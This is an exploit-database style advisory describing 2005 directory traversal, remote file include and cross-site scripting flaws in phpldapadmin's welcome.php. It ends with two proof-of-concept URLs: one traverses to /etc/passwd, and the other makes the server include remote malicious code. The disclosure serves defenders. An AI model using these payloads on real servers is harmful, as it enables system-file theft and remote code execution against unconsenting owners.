phpldapadmin Multiple Input Validation Vulnerabilities

vendor:

phpldapadmin

by:

SecurityFocus

7.5

CVSS

HIGH

Directory Traversal, Remote File Include, Cross-Site Scripting

22, 98, 79

CWE

Product Name: phpldapadmin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

phpldapadmin Multiple Input Validation Vulnerabilities

phpldapadmin is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. phpldapadmin is prone to a directory traversal vulnerability. An attacker can exploit this vulnerability to retrieve arbitrary files on the vulnerable system in the security context of the Web server process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible. phpldapadmin is prone to a remote file include vulnerability. An attacker can exploit this vulnerability to execute arbitrary PHP script code in the security context of the Web server process. phpldapadmin is also prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized. Additionally, applications should avoid using user-supplied input in the generation of file names, paths, or other system parameters. It is also possible to filter out malicious characters from user-supplied input.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14695/info

phpldapadmin is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

phpldapadmin is prone to a directory traversal vulnerability. An attacker can exploit this vulnerability to retrieve arbitrary files on the vulnerable system in the security context of the Web server process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.

phpldapadmin is prone to a remote file include vulnerability. An attacker can exploit this vulnerability to execute arbitrary PHP script code in the security context of the Web server process.

phpldapadmin is also prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=http://www.example.com/[malicious code]